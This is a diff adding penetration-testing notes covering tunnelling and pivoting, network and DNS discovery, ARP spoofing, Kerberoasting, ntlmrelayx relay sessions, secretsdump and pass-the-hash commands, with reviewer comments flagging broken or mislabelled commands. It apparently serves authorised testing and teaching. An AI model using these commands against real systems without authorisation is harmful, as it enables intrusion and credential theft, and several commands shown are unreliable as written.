@@ -0,0 +1,106 @@ +# Check if your tunnel is active and running: + +- nc -z localhost || echo 'no tunnel open' +- netstat -lpnt | grep | grep ssh +- ps aux | grep ssh + + + +# SSH Tunneling + + +Note: Target must have SSH running for there service + +1. Create SSH Tunnel: ssh -D localhost: -f -N user@localhost -p +2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf) +3. Add the following line into the config: Socks5 127.0.0.1 +4. Run commands through the tunnel: proxychains + +## SShuttle + +In Kali + +Source: https://github.com/sshuttle/sshuttle + +- sshuttle -r root@172.21.0.0 10.2.2.0/24 + + +# Meterpreter + +Use only if you have a meterpreter shell and you need to pivot to another network. + +## Portfwd + +- meterpreter > portfwd add -l 80 -r 172.21.0.0 -p 80 + +## Autoroute +In Metasploit +1. use post/multi/manage/autoroute +``` +msf5 post(multi/manage/autoroute) > options + +Module options (post/multi/manage/autoroute): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + CMD autoadd yes Specify the autoroute command (Accepted: add, autoadd, print, delete, default) + NETMASK 255.255.255.0 no Netmask (IPv4 as "255.255.255.0" or CIDR as "/24" + SESSION yes The session to run this module on. + SUBNET no Subnet (IPv4, for example, 10.10.10.0) + +msf5 post(multi/manage/autoroute) > +``` +2. set session +3. run + +## Metasploit Socks Proxy + + 1 auxiliary/server/socks4a normal No Socks4a Proxy Server + 2 auxiliary/server/socks5 normal No Socks5 Proxy Server + 3 auxiliary/server/socks_unc normal No SOCKS Proxy UNC Path Redirection + +# Ncat + +## Http Proxy +- ncat -vv --listen 3128 --proxy-type http + +## Port Forwarder +1. mknod pivot p +2. nc -l -p < port to listen on> 0 1>pivot + +# Cntlm + +apt install cntlm + +1. cntlm -u username@breakme.local -I proxy +2. export http://127.0.0.1:3128, export https://127.0.0.1:3128 +3. 
Accessing with browser: chromium --proxy-server="http://127.0.0.1:3128" + +# netsh port forwarding +- netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80 +- netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000 + + +# Proxy Binaries for Windows +Windows 10 has SSH (Thanks WSL!) +plink.exe (In Kali) + +# Other Tools: +- ssf: https://github.com/securesocketfunneling/ssf +- rpivot: https://github.com/klsecservices/rpivot +- hans (ICMP Tunneling): http://code.gerade.org/hans/ +- Iodine (ICMP Tunneling over DNS): https://code.kryo.se/iodine/ +- Dnscat2: https://github.com/iagox86/dnscat2 +- Chisel: https://github.com/jpillora/chisel +- httptunnel: In Kali apt install httptunnel +- ligolo: https://github.com/sysdream/ligolo +- reGeorg: https://github.com/sensepost/reGeorg +- + + +# Other Resources: + +- https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html +- https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/ +- https://medium.com/maverislabs/proxyjump-the-ssh-option-you-probably-never-heard-of-2d7e41d43464 + diff --git a/Pentest_Template_Master_2.0/_resources/310x310.png b/Pentest_Template_Master_2.0/_resources/310x310.png new file mode 100755 index 0000000..7ebd5b4 Binary files /dev/null and b/Pentest_Template_Master_2.0/_resources/310x310.png differ diff --git a/Pentest_Template_Master_2.0/_resources/d2550626a1c94aeebd273d43be0669c9.png b/Pentest_Template_Master_2.0/_resources/d2550626a1c94aeebd273d43be0669c9.png new file mode 100644 index 0000000..fa27c6c Binary files /dev/null and b/Pentest_Template_Master_2.0/_resources/d2550626a1c94aeebd273d43be0669c9.png differ diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Discovery Scans/DNS_Hostname Discovery.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Discovery Scans/DNS_Hostname Discovery.md new file mode 100644 index 0000000..27ceb65 
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Discovery Scans/DNS_Hostname Discovery.md
@@ -0,0 +1,68 @@ +# DNS Discovery + +DNSRecon: + +- dnsrecon -d www.example.com -a +- dnsrecon -d www.example.com -t axfr +- dnsrecon -d +- dnsrecon -d www.example.com -D -t brt + +Dig: + +- dig www.example.com + short +- dig www.example.com MX +- dig www.example.com NS +- dig www.example.com> SOA +- dig www.example.com ANY +noall +answer +- dig -x www.example.com +- dig -4 www.example.com (For IPv4) +- dig -6 www.example.com (For IPv6) +- dig www.example.com mx +noall +answer example.com ns +noall +answer +- dig -t AXFR www.example.com + +Dnsenum Enumeration: + +- dnsenum --dnsserver 172.21.0.0 -enum intranet.megacorpone.xx +- dnsenum --dnsserver 172.21.0.0 -enum management.megacorpone.xx +- dnsenum --dnsserver 172.21.0.0 -enum www.megacorpone.xx + +dnsX Enumeration: +- dnsx -l domains.txt -resp -a -aaaa -cname -mx -ns -soa -txt +- dnsx -silent -d megacorpone.com -w /usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt + +Using with subfinder: +- subfinder -silent -d megacorpone.com | dnsx -silent +- subfinder -silent -d megacorpone.com | dnsx -silent -a -resp +- subfinder -silent -d megacorpone.com | dnsx -silent -a -resp-only +- subfinder -silent -d megacorpone.com | dnsx -silent -cname -resp +- subfinder -silent -d megacorpone.com | dnsx -silent -asn + + +Nmap Enumeration: +``` +$ ls -lh /usr/share/nmap/scripts/ | grep dns +-rw-r--r-- 1 root root 1499 Oct 12 09:29 broadcast-dns-service-discovery.nse +-rw-r--r-- 1 root root 5329 Oct 12 09:29 dns-blacklist.nse +-rw-r--r-- 1 root root 10100 Oct 12 09:29 dns-brute.nse +-rw-r--r-- 1 root root 6639 Oct 12 09:29 dns-cache-snoop.nse +-rw-r--r-- 1 root root 15152 Oct 12 09:29 dns-check-zone.nse +-rw-r--r-- 1 root root 14826 Oct 12 09:29 dns-client-subnet-scan.nse +-rw-r--r-- 1 root root 10168 Oct 12 09:29 dns-fuzz.nse +-rw-r--r-- 1 root root 3803 Oct 12 09:29 dns-ip6-arpa-scan.nse +-rw-r--r-- 1 root root 12702 Oct 12 09:29 dns-nsec3-enum.nse +-rw-r--r-- 1 root root 10580 Oct 12 09:29 dns-nsec-enum.nse +-rw-r--r-- 1 root 
root 3441 Oct 12 09:29 dns-nsid.nse +-rw-r--r-- 1 root root 4364 Oct 12 09:29 dns-random-srcport.nse +-rw-r--r-- 1 root root 4363 Oct 12 09:29 dns-random-txid.nse +-rw-r--r-- 1 root root 1456 Oct 12 09:29 dns-recursion.nse +-rw-r--r-- 1 root root 2195 Oct 12 09:29 dns-service-discovery.nse +-rw-r--r-- 1 root root 5679 Oct 12 09:29 dns-srv-enum.nse +-rw-r--r-- 1 root root 5765 Oct 12 09:29 dns-update.nse +-rw-r--r-- 1 root root 2123 Oct 12 09:29 dns-zeustracker.nse +-rw-r--r-- 1 root root 26574 Oct 12 09:29 dns-zone-transfer.nse +-rw-r--r-- 1 root root 3910 Oct 12 09:29 fcrdns.nse +``` +-nmap x.x.x.x -v -p 53 --script=exampleScript1.nse,exampleScript2.nse + + + diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Discovery Scans/Domain_Sub Domain Discovery.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Discovery Scans/Domain_Sub Domain Discovery.md new file mode 100644 index 0000000..d8351b7 --- /dev/null +++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Discovery Scans/Domain_Sub Domain Discovery.md @@ -0,0 +1,17 @@ +# Domain Discovery + +Sublis3r: + +- Sublist3r -d www.example.com +- Sublist3r -v -d www.example.com -p 80,443 + +Subfinder: +- subfinder -d megacorpone.com + +OWASP AMASS: + +- amass enum -d www.example.com +- amass intel -whois -d www.example.com +- amass intel -active 172.21.0.0-64 -p 80,443,8080,8443 +- amass intel -ipv4 -whois -d www.example.com +- amass intel -ipv6 -whois -d www.example.com \ No newline at end of file diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Discovery Scans/Network Discovery Scans.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Discovery Scans/Network Discovery Scans.md new file mode 100644 index 0000000..7af110b --- /dev/null +++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Discovery Scans/Network Discovery Scans.md 
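Review bot: Two of the `dig` lines in this hunk are not valid as written: `dig www.example.com + short` splits the `+short` option into a bare `+` and a second query name `short`, and `dig www.example.com> SOA` contains a shell redirect, so no SOA query is made and the output lands in a file named `SOA`. They should read `dig www.example.com +short` and `dig www.example.com SOA`. `dig -x www.example.com` also looks wrong, since `-x` takes an address for a reverse lookup; an address placeholder would make the intent clear. The same two `dig` typos appear in the 1.0 and 2.0 copies of these notes elsewhere in the patch, so they should be fixed together.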
@@ -0,0 +1,112 @@
+# NetDiscover (ARP Scanning):
+- netdiscover -i eth0
+- netdiscover -r 172.21.10.0/24
+
+# Dsniff Arpspoof
+
+First enable Linux box to act as a router:
+
+`echo 1 > /proc/sys/net/ipv4/ip_forward`
+
+Then run `arpspoof`:
+
+`arpspoof -i -t -r `
+
+For example, to intercept traffic between targets, use:
+
+`arpspoof -i eth0 -t 192.168.4.11 -r 192.168.4.16`
+
+# Nmap:
+
+- nmap -sn 172.21.10.0/24
+- nmap -sn 172.21.10.1-253
+- nmap -sn 172.21.10.*
+
+You can also grep out the IPs and cut out fluf:
+```
+nmap -sn 172.x.x.x/24 | grep "172" | cut -f 5 -d ' '
+```
+
+A slower, more stealthier approach that utilizes the files containing the IP address split (as seen in the first section above) would be:
+```
+nmap --randomize-hosts -sn -T2 -oN nmap_discoveryScan_x.x.x.x-16.txt -iL x.x.x.x_IP_range.split.txt
+```
+This will export the results into a text file (`-oN`). Randomized hosts is optional, depending on the customer and the testing situation. The flag, `-oA`, can be used in place of `-oX` or `-oN`, as `-oA` will output the results to all output formats.
+
+The results for both command options shown above will be the list of hosts that responded to the ping, thus are up and alive.
+
+# Nbtscan:
+- nbtscan -r 172.21.1.0/24
+
+# Masscan
+- masscan 172.21.10.0/24 --ping
+
+# Ping Sweeps
+
+## Linux Ping Sweep (Bash)
+
+- for i in {1..254} ;do (ping -c 1 172.21.10.$i | grep "bytes from" &) ;done
+
+## Windows Ping Sweep (Run on Windows System)
+
+- for /L %i in (1,1,255) do @ping -n 1 -w 200 172.21.10.%i > nul && echo 172.21.1.%i is up.
+
+## Powershell Ping Sweep:
+Note: This command can also run on powershell for Linux
+
+- 1..20 | % {"172.21.10.$($_): $(Test-Connection -count 1 -comp 172.21.10.$($_) -quiet)"}
+- Get-PingSweep Subnet 172.21.10
+```
+# Reference: https://gist.github.com/joegasper/93ff8ae44fa8712747d85aa92c2b4c78
+function ResolveIp($IpAddress) {
+ try {
+ (Resolve-DnsName $IpAddress -QuickTimeout -ErrorAction SilentlyContinue).NameHost
+ } catch {
+ $null
+ }
+}
+
+function Invoke-PingSweep {
+ [CmdletBinding()]
+ Param(
+ [Parameter(Mandatory=$true)]
+ [string]$SubNet,
+ [switch]$ResolveName
+ )
+ $ips = 1..254 | ForEach-Object {"$($SubNet).$_"}
+ $ps = foreach ($ip in $ips) {
+ (New-Object Net.NetworkInformation.Ping).SendPingAsync($ip, 250)
+ #[Net.NetworkInformation.Ping]::New().SendPingAsync($ip, 250) # or if on PowerShell v5
+ }
+ [Threading.Tasks.Task]::WaitAll($ps)
+ $ps.Result | Where-Object -FilterScript {$_.Status -eq 'Success' -and $_.Address -like "$subnet*"}
+ Select-Object Address,Status,RoundtripTime -Unique |
+ ForEach-Object {
+ if ($_.Status -eq 'Success') {
+ if (!$ResolveName) {
+ $_
+ } else {
+ $_ | Select-Object Address, @{Expression={ResolveIp($_.Address)};Label='Name'}, Status, RoundtripTime
+ }
+ }
+ }
+}
+```
+
+## Python Ping Sweep:
+
+The following python script can be used to perform a ping scan.
+```
+#!/usr/bin/env python3
+import ipaddress
+from subprocess import Popen, DEVNULL
+
+for ping in range(1, 254):
+ address = "x.x.x.%d" % ping
+ response = Popen(["ping", "-c1", address], stdout=DEVNULL)
+ output = response.communicate()[0]
+ val1 = response.returncode
+ if val1 == 0:
+ print(address)
+```
+This script is specifically used for a /24 network. Modification required for other network types.
\ No newline at end of file
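Review bot: The PowerShell block in this hunk has a broken pipeline as shown: the line `$ps.Result | Where-Object -FilterScript {...}` has no trailing `|`, so the following `Select-Object Address,Status,RoundtripTime -Unique |` runs as a separate statement with no input and the sweep yields no objects; that line needs to end with ` |`. The usage line above the block, `- Get-PingSweep Subnet 172.21.10`, does not match the function it documents, which is invoked as `Invoke-PingSweep -SubNet 172.21.10`. In the Python block, `range(1, 254)` stops at .253 although the closing sentence says it covers a /24, so `range(1, 255)` is needed, and `import ipaddress` and the `output` variable are unused. The Windows one-liner pings `172.21.10.%i` but echoes `172.21.1.%i`, so the reported address is wrong.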
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/General Notes.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/General Notes.md
new file mode 100644
index 0000000..cedf233
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/General Notes.md
@@ -0,0 +1,21 @@
+# "PCAP IT OR IT DIDNT HAPPEN...its up to you if you need to"
+
+## tcpdump:
+
+- tcpdump -i eth0
+- tcpdump -c -i eth0
+- tcpdump -A -i eth0
+- tcpdump -w 0001.pcap -i eth0
+- tcpdump -r 0001.pcap
+- tcpdump -n -i eth0
+- tcpdump -i eth0 port 22
+- tcpdump -i eth0 -src 172.21.10.X
+- tcpdump -i eth0 -dst 172.21.10.X
+
+## Other tools:
+
+Tshark (Command Line Wireshark)
+Wireshark
+
+
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Masscan.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Masscan.md
new file mode 100644
index 0000000..c0145f6
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Masscan.md
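Review bot: Three tcpdump lines in this hunk will not run as written: `-c` takes a packet count, so `tcpdump -c -i eth0` needs a number such as `tcpdump -c 100 -i eth0`, and `-src`/`-dst` are not tcpdump options (tcpdump will try to read `-s` with an invalid snaplen); source and destination are BPF filter primitives, `tcpdump -i eth0 src host 172.21.10.X` and `tcpdump -i eth0 dst host 172.21.10.X`. Since the heading is about keeping captures as evidence, a short comment pairing `-w 0001.pcap` (write raw packets) with `-r 0001.pcap` (read a saved file back) would help the reader see that the two lines belong together. The same `-src`/`-dst` lines appear in the 1.0 copy of these notes earlier in the patch.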
@@ -0,0 +1,40 @@ +## Scanning targets +- masscan 172.21.10.0 +- masscan 172.21.10.0/24 172.21.0.0/16 +- masscan 172.21.10.0/24 --excludeFile +- masscan 172.21.10.0/24 --exclude 172.21.10.254 + +## Scanning for services: +- masscan 172.21.10.1 -p 80 +- masscan 172.21.10.1 -p 0-65535 +- masscan 172.21.10.1 -p 80,443 +- masscan 172.21.10.0/24 -p 0-65535 --rate 1000000 --open-only --http-user-agent \ +"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\ + -oL "output.txt" +# UDP Scan +- masscan 172.21.10.1 -pU 53 + +## Report only open ports +masscan 10.0.0.1 --open-only + +# Other Options +## Offline Mode (Reviews how fast the program runs without the transmit overhead) +- masscan 0.0.0.0/24 --offline + +## Obtaining Service banners: +- masscan 172.21.10.1 --banners + +## Set masscan to use a source ip +masscan 10.0.0.1 --source-ip 192.168.1.200 + +## Change the default user agent +masscan 10.0.0.1 --http-user-agent + +## Save sent packet in PCAP +masscan 10.0.0.1 --pcap + +# References: + +- https://github.com/robertdavidgraham/masscan +- https://danielmiessler.com/study/masscan/ + diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Nmap.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Nmap.md new file mode 100644 index 0000000..ff16ae7 --- /dev/null +++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Nmap.md 
@@ -0,0 +1,48 @@ +# Notes: +- remember to run nmap with sudo privlieges or set some linux capabilities to give nmap the required privileges it needs. + +To set Linux Capabilities on Nmap: +``` +sudo apt-get install libcap2-bin +sudo setcap cap_net_raw,cap_net_admin,cap_net_bind_service+eip $(which nmap) +getcap $(which nmap) +nmap --privileged +``` + +# Default Scans +- nmap -sC -sV 172.21.0.0 +- nmap -Pn -sC -sV -p- 172.21.0.0 +- nmap -sV -Pn 172.21.0.0 +- nmap -T4 -sC -sV 172.21.0.0 +- nmap -vv -Pn -A -sC -sS -T 4 -p- 172.21.10.0/24 -oA fullscan + + +# Stealth Scans: +- nmap -sS -sC -sV 172.21.0.0 +- nmap -sS -p- 172.21.0.0 + +# UDP Scan: +- nmap -sS -sU -Pn -sV 172.21.0.0 +- nmap -sU -A --top-ports=20 --version-all +- nmap -sU -A -p 53,67,68,161,162 --version-all + +# Aggressive Scans: +Once you have obtain results from your intial scan, run an aggressive scan in the background to obtain more information from the intial scan you executed: + +- nmap -oA fullscan-aggressive.txt -T4 -vvv --max-rtt-timeout 300ms --max-retries 3 --host-timeout 30m --max-scan-delay 500ms -Pn -p- --version-intensity 1 -iL fullscan.txt + +If scans are not completing or skipping hosts too quickly, change the `--max-rtt-timeout` and `--max-scan-delay` settings. Additionally, for a slower, more complete, stealthier approach, the following can be used: +- nmap -sT -Pn -p- --max-parallelism 1 --max-retries 0 --max-rtt-timeout 1000ms --max-hostgroup 1 -oX nmap_x.x.x.x-all_ports_slow.xml -iL x.x.x.x_Active_IPs.txt + + +TCP: + +# Nmap Scripts: + +Location: /usr/share/nmap/scripts/ + +- nmap --scripts vuln,safe,discovery -oN results.txt target-ip + +# Scans through Socks proxy: + +- nmap --proxies socks4://proxy-ip:8080 target-ip diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Other Scanners.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Other Scanners.md new file mode 100644 index 0000000..2803f66 
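Review bot: `nmap --scripts vuln,safe,discovery -oN results.txt target-ip` uses `--scripts`, which nmap rejects as an unknown option; the flag is `--script vuln,safe,discovery`. The SOCKS example `nmap --proxies socks4://proxy-ip:8080 target-ip` will silently bypass the proxy for the default SYN scan and ping discovery, because nmap's proxy support only covers TCP connect scans, so it should read `nmap -sT -Pn --proxies socks4://proxy-ip:8080 target-ip`. Worth a one-line caveat under "Stealth Scans" that `-sS` only keeps you out of the target's application logs, not out of a network IDS, and that the `vuln` category contains intrusive scripts that should be agreed with the client before running against production.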
--- /dev/null +++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Host Scans/Other Scanners.md @@ -0,0 +1,32 @@ +# Unicornscan: +- unicornscan -mU -p ,161,162,137,123,138,1434,445,135,67,68,53,139,500,637,162,69 + +# Netcat +``` +#!/bin/bash +for i in {0..255}; do + for j in {0..255};do + for k in {0..65535};do + nc -v -z -n -w 1 10.100.${i}.${j} ${k} >> nc_port_scan.txt + done + done +done +``` + +# Naabu + +Source: https://github.com/projectdiscovery/naabu + +## Installing Naabu: + +Latest: +go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest + + In Kali Linux: + sudo apt install naabu + + ## Using Naabu: + - naabu -host megacorpone.com + - naabu -p 80,443,21-23,u:53 -host megacorpone.com + - naabu -p - -exclude-ports 80,443 -host megacorpone.com + - naabu -host megacorpone.com -json \ No newline at end of file diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Pivoting_Tunneling.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Pivoting_Tunneling.md new file mode 100644 index 0000000..83eae5e --- /dev/null +++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Pivoting_Tunneling.md 
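Review bot: The Netcat loop walks 256 × 256 × 65536 (about 4.3 billion) host/port pairs one connection at a time with a one-second timeout each, so it can never complete, and because `nc -v` prints its results on stderr the `>> nc_port_scan.txt` redirect captures nothing useful. Narrow the outer loops to the real target range and capture both streams, e.g. `nc -v -z -n -w 1 10.100.${i}.${j} ${k} >> nc_port_scan.txt 2>&1`, and point readers at the masscan/nmap pages for anything wider than a few hosts. `unicornscan -mU -p ,161,162,...` also has a leading comma in the port list and lists 162 twice.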
@@ -0,0 +1,99 @@ +# Check if your tunnel is active and running: + +- nc -z localhost || echo 'no tunnel open' +- netstat -lpnt | grep | grep ssh +- ps aux | grep ssh +- ss -ntlp + +# SSH Tunneling + +Note: Target must have SSH running for there service + +1. Create SSH Tunnel: ssh -D localhost: -f -N user@localhost -p +2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf) +3. Add the following line into the config: Socks5 127.0.0.1 +4. Run commands through the tunnel: proxychains + +## SShuttle + +In Kali + +Source: https://github.com/sshuttle/sshuttle + +- sshuttle -r root@172.21.0.0 10.2.2.0/24 + + +# Meterpreter + +Use only if you have a meterpreter shell and you need to pivot to another network. + +## Portfwd + +- meterpreter > portfwd add -l 80 -r 172.21.0.0 -p 80 + +## Autoroute +In Metasploit +1. use post/multi/manage/autoroute +``` +msf5 post(multi/manage/autoroute) > options + +Module options (post/multi/manage/autoroute): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + CMD autoadd yes Specify the autoroute command (Accepted: add, autoadd, print, delete, default) + NETMASK 255.255.255.0 no Netmask (IPv4 as "255.255.255.0" or CIDR as "/24" + SESSION yes The session to run this module on. + SUBNET no Subnet (IPv4, for example, 10.10.10.0) + +msf5 post(multi/manage/autoroute) > +``` +2. set session +3. run + +## Metasploit Socks Proxy + + 1 auxiliary/server/socks4a normal No Socks4a Proxy Server + 2 auxiliary/server/socks5 normal No Socks5 Proxy Server + 3 auxiliary/server/socks_unc normal No SOCKS Proxy UNC Path Redirection + +## Port Forwarder +1. mknod pivot p +2. nc -l -p < port to listen on> 0 1>pivot + +# Cntlm + +apt install cntlm + +1. cntlm -u username@breakme.local -I proxy +2. export http://127.0.0.1:3128, export https://127.0.0.1:3128 +3. 
Accessing with browser: chromium --proxy-server="http://127.0.0.1:3128" + +# netsh port forwarding +- netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80 +- netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000 + + +# Proxy Binaries for Windows +Windows 10 has SSH (Thanks WSL!) +plink.exe (In Kali) + +# Other Tools: +- ssf: https://github.com/securesocketfunneling/ssf +- rpivot: https://github.com/klsecservices/rpivot +- hans (ICMP Tunneling): http://code.gerade.org/hans/ +- Iodine (ICMP Tunneling over DNS): https://code.kryo.se/iodine/ +- Dnscat2: https://github.com/iagox86/dnscat2 +- Chisel: https://github.com/jpillora/chisel +- httptunnel: In Kali apt install httptunnel +- ligolo: https://github.com/sysdream/ligolo +- reGeorg: https://github.com/sensepost/reGeorg + + + +# Other Resources: + +- https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html +- https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/ +- https://medium.com/maverislabs/proxyjump-the-ssh-option-you-probably-never-heard-of-2d7e41d43464 + diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/2. Recon Targets/Target _1.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/2. Recon Targets/Target _1.md new file mode 100644 index 0000000..9aaf438 --- /dev/null +++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/2. Recon Targets/Target _1.md @@ -0,0 +1,6 @@ +# Fill in results or other information about your target here: + + + + + diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/General Notes.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/General Notes.md new file mode 100644 index 0000000..e72c839 --- /dev/null +++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/General Notes.md 
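Review bot: The "Port Forwarder" recipe `mknod pivot p` / `nc -l -p < port to listen on> 0 1>pivot` has lost its second half and is not runnable: the named pipe has to feed a second netcat towards the destination, i.e. `nc -l -p <lport> 0<pivot | nc <target> <rport> 1>pivot`. Several other lines lost their placeholders the same way — `nc -z localhost || echo 'no tunnel open'` needs the port, `netstat -lpnt | grep | grep ssh` has an empty `grep`, `ssh -D localhost: -f -N user@localhost -p` needs its `<port>` values and the proxychains entry `Socks5 127.0.0.1` needs the `-D` port — so the section should say these are templates to fill in. `Iodine (ICMP Tunneling over DNS)` is mislabelled: iodine tunnels IPv4 over DNS, hans is the ICMP tunnel. For Cntlm, `export http://127.0.0.1:3128` should be `export http_proxy=http://127.0.0.1:3128 https_proxy=http://127.0.0.1:3128`, and the page should warn that cntlm keeps the domain password or NTLM hash in its config file or on the command line, which has to be scrubbed at the end of the engagement.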
@@ -0,0 +1,6 @@
+# When in Doubt...Always Enumerate! Enumeration is the key!
+
+## Resources
+- http://www.0daysecurity.com/penetration-testing/enumeration.html
+- Backup Link: https://web.archive.org/web/20201122081447/http://www.0daysecurity.com/penetration-testing/enumeration.html
+- https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-methodology
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket General Notes.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket General Notes.md
new file mode 100644
index 0000000..a4ef38f
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket General Notes.md
@@ -0,0 +1,12 @@
+## In Kali
+
+apt install impacket-scripts
+
+## Github
+
+https://github.com/fortra/impacket
+
+## Local Locations:
+
+/usr/share/doc/python3-impacket/examples
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket Kerberoasting.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket Kerberoasting.md
new file mode 100644
index 0000000..f12888f
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket Kerberoasting.md
@@ -0,0 +1,24 @@
+## Check for Kerberoasting:
+
+- GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip -format hashcat/john
+
+## GetUserSPNs
+
+ASREPRoast:
+- impacket-GetUserSPNs /: -request -format -outputfile
+- impacket-GetUserSPNs / -usersfile -format -outputfile
+
+Kerberoasting:
+- impacket-GetUserSPNs /: -outputfile
+
+Overpass The Hash/Pass The Key (PTK):
+- python3 getTGT.py / -hashes [lm_hash]:
+- python3 getTGT.py / -aesKey
+- python3 getTGT.py /:[password]
+
+## Using TGT key to excute remote commands from the following impacket scripts:
+
+- python3 psexec.py /@ -k -no-pass
+- python3 smbexec.py /@ -k -no-pass
+- python3 wmiexec.py /@ -k -no-pass
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket NtlmRelayX.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket NtlmRelayX.md
new file mode 100644
index 0000000..7cd18d0
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket NtlmRelayX.md
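Review bot: The headings are inverted relative to the commands beneath them: `GetNPUsers.py ... -usersfile user.txt -format hashcat/john` is the AS-REP roasting check (accounts with Kerberos pre-authentication disabled), while `impacket-GetUserSPNs ... -request` is Kerberoasting, yet the file labels the first "Check for Kerberoasting" and files the second under "ASREPRoast". Renaming the sections `## GetNPUsers (AS-REP Roast)` and `## GetUserSPNs (Kerberoast)` would stop a reader grabbing the wrong tool. The Overpass-the-Hash block should also say that `getTGT.py` writes a `.ccache` that must be exported before the `-k -no-pass` commands can use it: `export KRB5CCNAME=<user>.ccache`. Every command in the hunk has lost its `<domain>/<user>` and `-dc-ip <ip>` placeholders, so as written none of them parse.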
@@ -0,0 +1,62 @@ +# Utilizing Sock sessions with Responder and NtlmRelayX + +``` +ntlmrelayx> socks +Protocol Target Username Port +-------- -------------- ------------------------ ---- +SMB 172.21.48.38 SPAWN/MSIMMONS 445 +MSSQL 172.21.48.230 FAERIE/ADMINISTRATOR 1433 +MSSQL 172.21.48.230 FAERIE/ROOT 1433 +SMB 172.21.48.230 FAERIE/ADMINISTRATOR 445 +SMB 172.21.48.230 FAERIE/ALSIMMONS 445 +SMTP 172.21.48.225 FAERIEEXCHANGE/SBURKE 25 +SMTP 172.21.48.225 FAERIEEXCHANGE/TWILLIAMS 25 +IMAP 172.21.48.225 FAERIEEXCHANGE/TMCFARLANE 143 +``` + +# Testing Sock Access from NtlmRelayX: +## SMB: +Using SMBExec: +- proxychains4 impacket-smbexec SPAWN/MSIMMONS@172.21.48.38 +- proxychains4 smbexec.py SPAWN/MSIMMONS@172.21.48.38 +Using Smbclient +- proxychains4 impacket-smbclient SPAWN/MSIMMONS@172.21.48.38 +- proxychains4 smbclient.py SPAWN/MSIMMONS@172.21.48.38 + +## Secrets Dump +- proxychains4 impacket-secretsdump SPAWN/MSIMMONS@172.21.48.38 +- proxychains4 secretsdump.py SPAWN/MSIMMONS@172.21.48.38 + +## Pass The Hash: +If you obtain hashes from ntlmrelayx you can use the ntlm hash to gain access to a target using the following scripts or tools: + +Impacket Wmiexec: +- impacket-wmiexec -hashes ' INSERT HASH HERE' administrator@172.21.48.230 +- wmiexec.py -hashes ' INSERT HASH HERE' administrator@172.21.48.230 + +Evil-WinRM: +- evil-winrm -u Administrator -H 'INSERT HASH 